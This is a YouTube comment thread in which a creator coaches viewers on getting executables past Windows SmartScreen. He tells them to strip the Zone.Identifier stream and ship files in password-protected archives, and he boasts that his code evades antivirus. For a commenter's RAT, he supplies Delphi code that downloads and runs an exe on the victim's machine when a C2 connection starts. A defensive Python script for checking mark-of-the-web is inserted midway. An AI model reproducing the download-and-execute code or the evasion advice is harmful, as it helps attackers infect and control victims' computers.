Amazing content.
Amazing, the way you explain coding.
G.
@atcbrambo Yeah, I try to break things down and make them super easy to understand for people.
Thank you, directly from Brazil!
@marlon5344 You're welcome!
Does it bypass SmartScreen if we download it from a link as well?
@@VERTEXOp No, that's why I said in the video I don't consider it a bypass. All this code does is strip it of its alternate data streams and the Zone identifier so that it can be used to bypass Windows SmartScreen. However, it's up to you: after you use the code to clean it, you have to send it carefully, like zip it up password protected, do something so that web browsers cannot get to it to mark it with the Zone identifier number 3 showing that it came from the Internet zone, thus triggering Windows SmartScreen.
Oh, it won't work at all?
@VERTEXOp It works if used correctly. You have to understand that once you strip an executable file of its Zone identifier number 3 it can then bypass Windows SmartScreen. The problem is that when other people download your exe file from the Internet it's going to be retagged with Zone identifier number 3 every single time, most likely, unless you upload to a trusted source or something. So you see, once they download your file it gets retagged with its own identifier number 3 showing that it came from the Internet, thus triggering Windows SmartScreen. To keep that from happening, what you need to do is use the software to strip the file of its Zone identifier number 3, then zip the file up in some sort of archive to keep it protected; this way web browsers cannot see it directly and cannot mark it with the Zone identifier number 3.
So you see, you can bypass Windows SmartScreen easily. When I stated I don't consider this a bypass, it's because I don't consider it a direct bypass method; it's not an exploit. All the code does is merely remove an alternate data stream from an executable file, nothing more and nothing less.
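As an added example (not from the video or anyone in this thread), a small Python inspector for the Zone.Identifier stream the comments above describe: it parses the stream's [ZoneTransfer] body, maps ZoneId to its zone name and reports whether a file carries the Internet mark, which is how a defender verifies mark-of-the-web on a downloaded file instead of trusting its absence. The stream text is constructed, and the script name in the usage comment is an assumption.

```python
import sys

# Zone ids written into the Zone.Identifier alternate data stream (Windows URLZONE values).
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

# Constructed sample of what a browser writes into <file>:Zone.Identifier (not captured from a real system).
SAMPLE_STREAM = (
    "[ZoneTransfer]\r\n"
    "ZoneId=3\r\n"
    "ReferrerUrl=https://example.com/downloads/\r\n"
    "HostUrl=https://example.com/downloads/tool.exe\r\n"
)

def parse_zone_identifier(text):
    """Parse the INI-style stream body; None if it has no [ZoneTransfer] section."""
    fields = {}
    in_section = seen_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].strip().lower() == "zonetransfer"
            seen_section = seen_section or in_section
            continue
        if in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    if not seen_section:
        return None
    try:
        zone_id = int(fields.get("ZoneId", ""))   # None if the key is missing or malformed
    except ValueError:
        zone_id = None
    return {"zone_id": zone_id, "zone_name": ZONE_NAMES.get(zone_id, "Unknown"), "fields": fields}

def is_marked_from_internet(text):
    """True for ZoneId 3 (Internet) or 4 (Restricted Sites), the zones SmartScreen acts on."""
    info = parse_zone_identifier(text)
    return info is not None and info["zone_id"] is not None and info["zone_id"] >= 3

def read_zone_identifier(path):
    """Raw Zone.Identifier stream of a file, or None when absent (ADS exist only on NTFS/Windows)."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as stream:
            return stream.read()
    except OSError:
        return None

if __name__ == "__main__":
    # Usage: python motw_check.py <file> ...  (reports each file's mark-of-the-web status)
    for path in sys.argv[1:]:
        text = read_zone_identifier(path)
        info = parse_zone_identifier(text) if text is not None else None
        if info is None:
            print(f"{path}: no Zone.Identifier stream (not marked)")
        else:
            print(f"{path}: ZoneId={info['zone_id']} ({info['zone_name']}), HostUrl={info['fields'].get('HostUrl', '-')}")
```

Note that Explorer's built-in zip extraction copies the Zone.Identifier onto the extracted files, so the check belongs on the file that actually gets executed, not only on the archive.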
Please make a bypass video where it bypasses SmartScreen if we download it from anywhere on the Internet. And please make a video on whether .js and .reg files bypass SmartScreen, because some crypters bypass SmartScreen from a .js file; how do they do that?
@VERTEXOp If the cryptor outputs an executable file, it wouldn't matter if there was a file packed with it capable of performing DLL sideloading, because the exe file itself would already be flagged if downloaded from an untrusted source; therefore no code would be able to execute in the first place (if the user did not allow it through Windows SmartScreen).
And if outputting batch files or any other type of scripting files, say for example something like PowerShell, you run into even worse troubles having to bypass AMSI, not to mention you include a host of new dependencies and requirements to get your code to run on the client machine, which in my view makes it a million times worse.
This is why I choose Delphi as my one and only programming language: the more files you include of different types, the more languages you have to know and understand and the more dependencies you introduce to your projects. The more dependencies you have, the less likely your code is to run as expected in any given environment.
Ultimately, why write code to bypass Windows SmartScreen when you don't have to bypass Windows SmartScreen because you already bypass it by default? Keep in mind the more noise you make on a system, the more likely your binary is to get caught by AV.
And one other thing, this is just kind of a for-the-record type deal: I've been writing Pascal/Delphi code for over 20 years, and none of the stuff that I've given out to people that I expected to run and bypass has ever been detected, and that includes both SmartScreen and AV companies! Which brings me to my next point: you don't ever need a cryptor as long as you code your own projects. For some reason most people have trouble understanding this, but if you want to hide from antivirus just code your own project; by default you will bypass 99% of them guaranteed, especially in Pascal/Delphi.
Can you teach us how to do tasks?
For example when client connects to C2 it will automatically download and execute a file on their computer.
(Sorry for commenting twice lol)
Usually RATs written in native programming languages do not need to download external dependencies; it kind of defeats the purpose of using a native programming language, but I suppose if you wrote it that way to be "Modular" or whatever that's fine... To do what you've asked, all you would have to do is this: depending on the socket library you have chosen to go with, there will be an "OnConnect Event" both on the client side and the server side that you can write some logic in to do whatever "Tasks" you need. Check out some of my socket training videos: ua-cam.com/video/nTFDiRje7cU/v-deo.html, ua-cam.com/video/e7wjOgnGMJY/v-deo.html, ua-cam.com/video/t_jykzyf5nU/v-deo.html, ua-cam.com/video/b46OT2daq_k/v-deo.html, ua-cam.com/video/vUnPBdVzFeI/v-deo.html, ua-cam.com/video/Nuasl8xfCmA/v-deo.html. They may shed some light on the socket events and stuff.
As for downloading a file from a URL and executing it, the process would be quite simple: just find the IdHTTP component or a similar HTTP component, drag and drop it to your form OR simply include its Uses statement and create it virtually in code if you are doing things from the client side, since usually a RAT client will not have a GUI directly but rather be in the form of a console application. Once you have everything in place for the HTTP stuff you also need to include ShellAPI in your uses statement so you can make Windows ShellExecute the .exe file or whatever...
Here is a really good example code to accomplish what you're trying to do (keep in mind I'm writing this from memory, I'm not testing it, but it should work):
// Units this snippet depends on (Windows for SW_SHOWNORMAL, Classes for TFileStream, ShellAPI for ShellExecute, IdHTTP for the Indy HTTP client):
uses
  Windows, Classes, ShellAPI, IdHTTP;

//We make a Procedure which we can simply call to download the .exe file and execute it after the download finishes...
procedure DownloadAndRunExe(const URL, FileName: string);
var
  IdHTTP: TIdHTTP;         //The HTTP component responsible for downloading the .exe binary from a URL...
  FileStream: TFileStream; // This could be a Filestream or a Tmemorystream whatever suits your needs...
begin
  IdHTTP := TIdHTTP.Create(nil); //Creating the HTTP component with no parent so it just sits in memory waiting to be used...
  try
    FileStream := TFileStream.Create(FileName, fmCreate); // Creating a filestream to your SSD/HDD, the Filename is both the name and path to the .exe
    //in this case keeping it simple like myfile.exe would result in the .exe being saved at the same location your client.exe is running from...
    try
      IdHTTP.Get(URL, FileStream); // Getting Or DOWNLOADING the file from the internet... (SUPER EASY)
    finally
      FileStream.Free; //Once file is finished downloading we need to free the FileStream Variable so it no longer takes up memory space...
    end;
  finally
    IdHTTP.Free; // Since we are finished using the HTTP component its good practice to just free this as well... no need to take up memory...
  end;
  // Running the downloaded .exe file
  ShellExecute(0, 'open', PChar(FileName), nil, nil, SW_SHOWNORMAL); // Uses Windows ShellExecute API to run the file you input, in this case the .exe you
  //Downloaded from the internet...
end;

// To use this code simply call the following single line of code in your sockets "OnConnected or OnConnect Events as needed"
// (IdHTTP.Get needs the URL to carry its scheme, e.g. http://, so it is included here)
DownloadAndRunExe('http://example.com/file.exe', 'C:\DownloadedFile.exe');
//Take note that the second parameter can either be a filename by itself OR a path and the filename...
//Simply putting something like file.exe instead of C:\file.exe would place the downloaded file alongside the client.exe's running location.
I hope I explained this well enough and if you need further assistance just let me know!
@@BitmasterXor thanks, I use netcom7.
OnConnect I will make it check if there are any tasks, and if there are, check their parameters (e.g. URL, file name, and whether to execute in memory or on disk); if there are, then I will send a command with those parameters to the client to execute the task.
As an added bonus to this question, a little piece of advice: the default installed Indy socket components, which include the IdHTTP component, do not handle SSL "out of the box", so sites that host files which have HTTPS
No worries on posting twice, man... did you get it working ok? I forgot to mention to you that you don't just have to make it download a file from a website using HTTP; you can also send a raw file over the established TCP socket connection the client has made to your server if you wanted to as well.
Please video on rat in delphi with winsock ❤
I am planning on making a series of videos concerning RAT development; however, I'm not sure about using raw Winsock lol, that takes quite a bit more effort rather than simply using a wrapper. I may make a video covering Winsock or something though.
Also, if you have not already, check out all my other videos covering socket wrappers and socket components (I basically show how to make a mini RAT in each video):
ua-cam.com/video/nTFDiRje7cU/v-deo.html
ua-cam.com/video/e7wjOgnGMJY/v-deo.html
ua-cam.com/video/t_jykzyf5nU/v-deo.html
ua-cam.com/video/b46OT2daq_k/v-deo.html
ua-cam.com/video/vUnPBdVzFeI/v-deo.html
ua-cam.com/video/Nuasl8xfCmA/v-deo.html
Thanks For Watching!
😃
@@BitmasterXor I have found the src of spyn3t on GitHub and it uses Winsock, but it's hard to understand the logic lol, 80,000 lines of code. Pls make a video on a RAT that's easier to understand, and with Winsock if possible 🙂
Saw you posted a comment but I do not see it on here, so here is some further information for you:
SpyNet RAT was not made using raw Winsock; it has the Winsock uses statement on the server endpoint, but that's only because to make the RAT project the author used a combination of TClientSocket and TServerSocket on the server side, and on the client side he used Indy 9 sockets... Both libraries are really old and only used for legacy-based stuff anymore these days. We have much better socket libraries and wrappers like "NetCom7", "mORMot", "TMS Sockets", "DZSockets, which are basically an upgraded version of TClientSocket and TServerSocket", "Indy 10 Sockets... which are an updated version of the Indy 9 sockets used in the SpyNet RAT project"... and many, many more!
@@BitmasterXor ok, thank you so much, I hope you will add new tutorials soon
@@bernardoportugues1157 I'll be working on some new stuff for you guys; hopefully I can get around to posting it sometime soon! 😃
Can I get your mail or TG, if possible?
@@RaGhav363 My DC is bitmasterxor if you need to talk to me directly or privately.